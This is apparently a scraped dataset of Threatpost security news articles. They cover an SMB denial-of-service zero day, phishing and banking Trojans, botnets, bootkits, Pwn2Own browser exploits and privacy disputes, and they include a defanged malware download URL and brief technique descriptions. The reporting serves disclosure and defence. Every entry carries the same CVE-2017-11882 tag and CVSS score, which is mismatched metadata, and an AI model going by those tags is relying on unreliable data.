security branch, and likely never fixed. Saturday\u2019s DEF CON talk will be 60 days after the initial report was sent to Microsoft and 45 days after Microsoft\u2019s response was relayed.\n\n\u201cThe case offers no serious security implications and we do not plan to address it with a security update,\u201d a Microsoft spokesperson told Threatpost. \u201cFor enterprise customers who may be concerned, we recommend they consider blocking access from the internet to SMBv1.\u201d\n\n\u201cThe reason they say it\u2019s a moderate issue is because it does require opening many connections to the server, but you could do it all from a single machine, and a Raspberry Pi could take down the beefiest server,\u201d Dillon said.\n\nThe vulnerability lies in the way SMB packets are processed and memory is allocated. Dillon and Harding said they found a way to take advantage of that allocation system to crash a server.\n\n\u201cIt will amplify already existing attacks like DDoS attacks,\u201d Dillon said. \u201cWhy DDoS when you can DoS from a single machine. You don\u2019t need a botnet to take down a Windows server.\u201d\n\nThe attack is able to allocate all memory a server has available, to the point where it won\u2019t even blue screen, Dillon said. The operating system crashes as it looks through long memory lists looking for unallocated memory, causing the CPU to spike.\n\n\u201cYou get critical services to crash and you can completely freeze the system,\u201d Dillon said. \u201cThere are also lots of integrity issues because when you have all the non-paged pool memory allocated already, certain disk rights, even logging can\u2019t take place because there\u2019s no memory. One of the problems we\u2019ve run into is that we\u2019ve completely exhausted the system and cause it to freeze; one of the reasons it doesn\u2019t blue-screen is because it doesn\u2019t have enough resources needed to blue-screen. It will freeze and never come back.\u201d\n\nDillon said he and Harding will share some additional technical details during their talk and will demo the attack.\n\n\u201cIt\u2019s such a simple attack really; I think a lot of the people there will be able to catch on to what\u2019s happening,\u201d Dillon said.\n\nAs for a fix, Dillon believes it wouldn\u2019t be a simple task for Microsoft.\n\n\u201cI think that\u2019s the problem is that it\u2019s not the easiest fix; it\u2019s the way they\u2019ve done SMB memory allocation for over 20 years. So everything relies on the fact the client says \u2018I have a buffer that I\u2019m sending that\u2019s this big.\u2019 The server reserves that much memory so it can handle it,\u201d Dillon said. \u201cWhat we did we say I have a huge buffer and never send the buffer. There\u2019s still a lot of components that rely on the fact that buffer is already allocated and the size is already known.\u201d\n\nDillon said a mitigation can be applied through inline devices including firewalls by limiting the number of active connections from a single IP address to SMB ports.\n\nIronically, the only reason Dillon and Harding found the bug was because this critical information used in the pool grooming for EternalBlue.\n\n\u201cYou have to have those allocations happen,\u201d Dillon said. \u201cSo actually, if this behavior was not the way it was, the pool grooming in EternalBlue would not be the same and the exploit might not work at all.\u201d\n", "cvss3": {}, "published": "2017-07-26T09:00:26", "type": "threatpost", "title": "Windows SMB Zero Day to Be Disclosed During DEF CON", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-07-31T22:05:32", "id": "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "href": "https://threatpost.com/windows-smb-zero-day-to-be-disclosed-during-def-con/126927/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday this year\u2019s crop of tax scams are using social engineering attacks based on fear to spread Zdowbot and Omaneat banking Trojans and collect personal info via spoofed tax sites linked to from phishing campaigns.\n\nThe warning comes with less than a month before the April 18 tax deadline and add to an already busy tax season of scams reported by various security experts and the U.S. Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d and \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. Microsoft says scammers are also targeting certified public accountants with email subject lines \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warn recipients they face pending tax-related law enforcement action. A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in a Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Email with the subject line \u201cI need a CPA\u201d contain the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1-1024x742.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1.png>)\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains a malicious macro code. If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. \u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. Emails don\u2019t include attachments, rather they include warnings from the sender that purports to be from the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png>)\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. Even if the emails came from someone you know, be wary about opening the attachment or click on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[![Nitol botnet](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073029/nitolbotnet.jpg)](<https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/>)When Microsoft went after the [Nitol botnet](<https://threatpost.com/microsoft-carries-out-nitol-botnet-takedown-091312/>) in September, one of the key details in the investigation was the fact that much of the botnet was built by pre-loading malware onto laptops during the manufacturing process in China. This was the clearest case yet of the phenomenon of [certified pre-owned devices](<https://threatpost.com/new-study-sees-need-better-software-integrity-controls-061410/>) making their way through the supply chain and into the market. As it turns out, nearly half a million of those infected machines showed up here in the U.S.\n\nResearch from Microsoft into the location of the Nitol-infected machines shows that the large majority of them are in China, nearly 800,000 of them. That\u2019s more than 30 percent of all of the machines on which Microsoft detected the Nitol malware, and the company said that about one in every five machines purchased in China through the compromised supply chain had malware on it.\n\nAlthough the number of infected systems in the United States wasn\u2019t nearly as high as in China, Microsoft did find nearly 500,000 PCs in the U.S. loaded with Nitol, a pretty significant volume of infections.\n\n\u201cMMPC\u2019s infection figures for [Win32/Nitol](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32/Nitol> \"MMPC Encyclopedia entry for Win32/Nitol\" ) reflect the Microsoft study, placing China on the top spot with a whopping 31.60%, way above the United States (18.51%) and Taiwan (16.79%). Thailand and Korea round out the top five,\u201d [Rex Plantodo of the Microsoft Malware Protection Center.](<https://blogs.technet.com/b/mmpc/archive/2012/10/22/msrt-october-12-nitol-by-the-numbers.aspx?Redirected=true>)\n\nMicrosoft began looking into the Nitol botnet more than a year ago after buying 20 laptops in China and discovering that some of them had been pre-loaded with the Nitol malware, as well as a few other pieces of malicious software. Nitol is a nasty bit of code and has quite a list of malicious capabilities. It has rootkit functionality and also can laucnh DDoS attacks on orders from a remote command-and-control server.\n\nMicrosoft\u2019s takedown of Nitol disrupted much of the botnet\u2019s operations, but it didn\u2019t completely eliminate it. The company\u2019s detections show a major drop in Nitol infections since September, but there are still more than 200,000 infections in October.\n\n \n\n", "cvss3": {}, "published": "2012-10-24T17:59:06", "type": "threatpost", "title": "Nitol Infections Fall, But Malware Still Popping Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "href": "https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/77149/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:34", "description": "[![IE9 bugs](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065313/ie9_bugs.jpg)](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>)The same team from VUPEN that took down Google Chrome on Wednesday has succeeded in compromising Internet Explorer 9 on Windows 7, using two separate bugs. The success at the Pwn2Own contest was the result of a heap overflow bug in IE as well as a separate bug in the browser\u2019s protected mode.\n\nThe heap overflow vulnerability exists in many versions of IE, from version 6 through IE 10, which is in consumer preview right now. Chaouki Bekrar of VUPEN said that the compromise of IE was quite challenging and that it took two of his team members about six weeks of work to find the bugs and make the exploits work.\n\nThe bug that enabled the team to break out of IE\u2019s protected mode\u2013which is analogous to the sandbox in Google Chrome\u2013is a memory corruption flaw in protected mode itself. As part of the Pwn2Own contest rules, VUPEN will turn over the heap overflow details to TippingPoint, which runs the contest, and they will then pass the information on to Microsoft. The protected mode bypass, however, will stay in VUPEN\u2019s hands.\n\nThe VUPEN team has a large lead in the Pwn2Own contest, after compromising Chrome and IE, as well as writing exploits for several of the public vulnerabilities that TippingPoint handed out at the beginning of the competition. However, another team comprising two former winners, Vincenzo Iozzo and Willem Pinckaers, also has entered the contest. Still, Bekrar said his team didn\u2019t necessarily need to use the IE bugs.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065311/vupen_pwn.jpg)\u201cWe dropped it because we could,\u201d he said.\n\nThe heap overflow bug that VUPEN used to compromise IE enabled the team to get into the browser\u2019s low-integrity area and then they used the memory-corruption flaw in protected mode to get into the high-integrity area.\n\n\u201cThe Chrome sandbox is much harder to escape for us, because we have the bug in protected mode,\u201d Bekrar said.\n\nThe IE bugs enabled the team to bypass ASLR and DEP on Windows, and although the bug also works on IE 10 on Windows 8, Bekrar said that what he\u2019s seen of the forthcoming version of the browser, it will be more difficult to exploit.\n\n\u201cIE 10 is more complicated to exploit because they\u2019ve added some protections to make it harder to use memory leaks and use-after-free bugs,\u201d he said. \u201cI think that will make the prizes [in Pwn2Own] go higher.\u201d\n", "cvss3": {}, "published": "2012-03-08T22:56:42", "type": "threatpost", "title": "IE 9 Falls to Pair of Zero Days at Pwn2Own", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:39", "id": "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "href": "https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/76310/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:03", "description": "[![Windows patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065018/windowspatchmini.jpg)](<https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/>)Microsoft plans to issue seven security bulletins in the [January Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release next week, fixing six vulnerabilities rated important and one rated critical. The bugs affect a variety of products, including Windows XP, Vista, Windows 7, Server 2003 and 2008 and Microsoft Developer Tools and Software.\n\nJust three of the seven bulletins Microsoft will issue on Jan. 10 will fix a vulnerability that could lead to remote code execution. The others can either lead to elevation of privilege or information disclosure. However, there is one bulletin that Microsoft has said can also lead to \u201csecurity feature bypass,\u201d something that isn\u2019t typically seen on the company\u2019s security bulletins.\n\n\u201cIn addition, eagle-eyed readers of the summary page will notice an unusual vulnerability classification, \u2018Security Feature Bypass,\u2019 for one of our Important-severity bulletins. SFB-class issues in themselves can\u2019t be leveraged by an attacker; rather, a would-be attacker would use them to facilitate use of another exploit. For those interested in learning more, we expect the SRD blog to publish a detailed analysis of the matter on Tuesday,\u201d Microsoft\u2019s Angela Gunn wrote in a blog post.\n\nThe company will release full information on the patches and which vulnerabilities they apply to on Tuesday.\n", "cvss3": {}, "published": "2012-01-06T15:08:03", "type": "threatpost", "title": "Microsoft to Issue Seven Bulletins, One Critical, on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "href": "https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/76067/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:21", "description": "A security researcher who has in the past has created low-level rootkits capable of staying resident on an infected machine after reboots, said he has now accomplished the same feat on Windows 8, which hasn\u2019t even hit the shelves yet. Peter Kleissner said he has created a new version of his Stoned bootkit that defeats the pre-boot security checks included in the forthcoming OS and survives reboots.\n\nKleissner is known in the security community for his creation of the [Stoned bootkit](<http://www.stoned-vienna.com/>), a sophisticated form of rootkit that is designed to load from the master boot record and stay resident in memory throughout the boot process. The previous version of the bootkit was designed to work on Windows XP through Windows 7, but the new one that Kleissner has written also works on Windows 8. He said in a message on Twitter Thursday that Stoned Lite is a small footprint bootkit that can be loaded from either a USB stick or a CD.\n\nHe said he may also add some other functionality to the software in the near future.\n\n\u201cMight add in-memory patching of msv1_0!MsvpPasswordValidate, so it allows to log on with any password.. nothing new but nice and fancy,\u201d Kleissner said in a later Twitter message.\n\nThe pre-boot security mechanisms in Windows 8 have drawn a lot of scrutiny in recent months, particularly the fact that [Microsoft is implementing a version of UEFI](<https://threatpost.com/secure-boot-windows-8-worries-researchers-092211/>) instead of the traditional BIOS. UEFI includes some functionality that allows Microsoft to require that any software loaded during the boot sequence of a Windows PC be signed by one of the keys loaded into the firmware. Open-source advocates have argued that the technology could allow the company to prevent users from loading alternate operating systems, but Microsoft and [officials from the Linux Foundation](<https://threatpost.com/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111/>) have said that isn\u2019t necessarily the case.\n\nKleissner said that he notified Microsoft of his work and has given the company the source code of the bootkit and the paper he\u2019s written for a conference presentation.\n\nMicrosoft has not confirmed the details of Kleissner\u2019s claims.\n", "cvss3": {}, "published": "2011-11-17T20:42:19", "type": "threatpost", "title": "New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:19", "id": "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "href": "https://threatpost.com/new-version-stoned-bootkit-said-bypass-windows-8-secure-boot-111711/75909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:25", "description": "The Hungarian research facility that helped discover Duqu, the [much-blogged about](<https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/>) Trojan, has now released an open-source toolkit that can be used to help detect traces and instances of the worm.\n\nThe Laboratory of Cryptography and System Security (CrySys) at the Budapest University of Technology and Economics developed the [Duqu Detector Toolkit v1.01](<http://www.crysys.hu/duqudetector.html>) to be used on computers and networks where the malware may have already been removed from the system. Duqu \u2013 a cousin of the Stuxnet worm that infected uranium enrichment facilities in Iran, famously had a hard-coded 36 day lifespan. But ystems may still retain certain Duqu files even after the virus has deactivated itself.By focusing on what they refer to as \u201csuspicious files,\u201d the toolkit can \u201cdetect new, modified versions of the Duqu threat,\u201d CrySys said. \n\nLike other toolkits, CrySys claims the tool could still generate false positives and therefore encourages a professional looks over the log files of each test.\n\nAs Threatpost [previously reported](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), users can be infected with Duqu after opening a particular Word document that exploits a flaw in Windows\u2019 Win32k TrueType font parsing engine and lead to remote code execution. Microsoft has maintained they\u2019re working on a patch for the bug but in the meantime, [released a workaround](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) for the kernel flaw late last week.\n", "cvss3": {}, "published": "2011-11-10T16:17:49", "type": "threatpost", "title": "New Toolkit Able to Track and Trace Duqu Worm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:22", "id": "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "href": "https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/75879/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Redmond, Washington software giant, Microsoft, and Detroit based GM subsidiary, OnStar backtracked on policies widely seen as egregious privacy violations following lawsuits and public outcry. Here\u2019s the news:\n\n**Windows Phone Update Requires User Consent For Tracking**\n\nMicrosoft released their \u201cMango\u201d update, which, according to a report by Tom Warren on [Winrumors](<http://www.winrumors.com/windows-phone-7-5-no-longer-accesses-location-data-without-authorization/>), updates the Windows Phone, addressing widespread accusations and [a related lawsuit](<https://threatpost.com/class-action-lawsuit-accuses-microsoft-illegal-geotagging-090211/>) that the company had been tracking device locations without reasonable consent.\n\nIn a location and privacy FAQ on the Microsoft website, the company staunchly claims that the location information stored within the Windows Phone 7 devices is intended to gather information about nearby Wi-Fi access points and provide users with location based services more efficiently and effectively; this information does not uniquely identify or track devices, they say.\n\nHowever, the company also says they discovered that some of that information had been periodically relayed back to Microsoft when users access the camera application and use its US-English voice command feature. (Whoops!) This relay of information, Microsoft claims, is an unintended behavior. The latest update resolves these and other issues. Now users will have to agree if they want to the Camera application to tag photo location. Voice Command will no longer request location information at all.\n\nFor more information, read the FAQ [here](<http://www.microsoft.com/windowsphone/en-us/howto/wp7/web/location-and-my-privacy.aspx>).\n\n**OnStar Won\u2019t Force Automated Location Tracking**\n\nOnStar found itself in a similar situation after it was discovered that the vehicle navigation and emergency notification service was to begin [monitoring the speed and location of vehicles](<https://threatpost.com/onstar-track-speed-location-cars-even-after-opting-out-092111/>) equipped with OnStar technology on December 1, even if those owners decided to opt-out or cancel OnStar\u2019s services.\n\nA press release published yesterday on the OnStar website announced that the company is revising their proposed terms and conditions to make it clear that customer data will not be collected after a customer cancels their OnStar service.\n\n\u201cWe realize that our proposed amendments did not satisfy our subscribers,\u201d OnStar President Linda Marshall said in the statement. \u201cThis is why we are leaving the decision in our customers\u2019 hands. We listened, we responded and we hope to maintain the trust of our more than 6 million customers.\u201d\n\nThe appearance of GPS and other location tracking technologies in mobile phones, cars and other devices has [raised concerns among privacy and civil liberties advocates in the U.S. and elsewhere](<https://threatpost.com/location-based-services-raise-privacy-security-risks-082510/>). An analysis by the Wall Street Journal found that iPhones running version 4 of the company\u2019s iOS operating system appeared to [track a user\u2019s location and movement](<https://threatpost.com/report-iphones-track-movement-even-location-services-disabled-042511/>) of whether the user enabled or disabled location tracking. Like Microsoft, Apple claimed that the phones weren\u2019t tracking specific users\u2019 movements, just using the company\u2019s huge user base to assemble an accurate list of active cell phone towers and WiFi hotspots. Software vendors, also, have been discovered to be collecting location data, often quite apart from the kind of service they are providing. In just one example, the mobile phone application for the Pandora music streaming service was [found to be harvesting user location data](<https://threatpost.com/pandora-mobile-app-transmits-gobs-personal-data-040611/>). \n\nSecurity experts have wondered, aloud, [how else the company might use the location and movement data that is collected](<https://threatpost.com/iphones-location-and-threats-your-assets-042711/>), including how it might be used by third party advertisers. \n", "cvss3": {}, "published": "2011-09-28T18:07:32", "type": "threatpost", "title": "Blowback: Microsoft, OnStar Pump the Brakes on Location Tracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:07:09", "id": "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "href": "https://threatpost.com/blowback-microsoft-onstar-pump-breaks-implicit-gps-tracking-092811/75700/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "description": "Microsoft\u2019s lawsuit against the U.S. government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support by privacy advocates. For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. \n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. \u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer Brad Smith said Microsoft said it has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. More than 1,752 (68 percent) of those secrecy orders had no end date. Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges gag order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reforms of ECPA have been long fought by privacy advocates such as the Electronic Privacy Information Center. \n\nAlan Butler, senior counsel at Electronic Privacy Information Center said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. \u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. \n\nFor the ACLU, it used Microsoft\u2019s lawsuit as an opportunity for Congress to implement reforms on the Electronic Communications Privacy Act. \u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that also attempts to fix notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. \u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. \n\nBecause of the secret nature of such requests, it\u2019s impossible to tell how many secret government information requests businesses receive. One estimate from a 2012 report authored by Texas Southern University\u2019s Thurgood Marshall School of Law called \u201c[Gagged, Sealed & Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), estimates 30,000 electronic surveillance orders approved by magistrate judges each year. \n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. \n", "cvss3": {}, "published": "2016-04-15T15:22:02", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-15T19:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "**UPDATE**\u2013As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren\u2019t enough for organizations to deal with, HP\u2019s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.\n\nThe four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones. Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI\u2019s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.\n\n\u201cWe\u2019re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. We continue to monitor the situation and will take appropriate steps to protect our customers,\u201d a Microsoft spokesperson said.\n\nEach of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.\n\nThe most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.\n\n\u201cThe vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document\u2019s elements an attacker can force a Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.\n\nThat vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.\n\nAmong the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.\n\n\u201cThe specific flaw exists within the handling of CAttrArray objects. By manipulating a document\u2019s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says. \n\nThe other two vulnerabilities are similar, in that they involve IE mishandling certain objects. IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse. \n\n_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft. _\n\n_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>). _\n", "cvss3": {}, "published": "2015-07-23T09:14:36", "type": "threatpost", 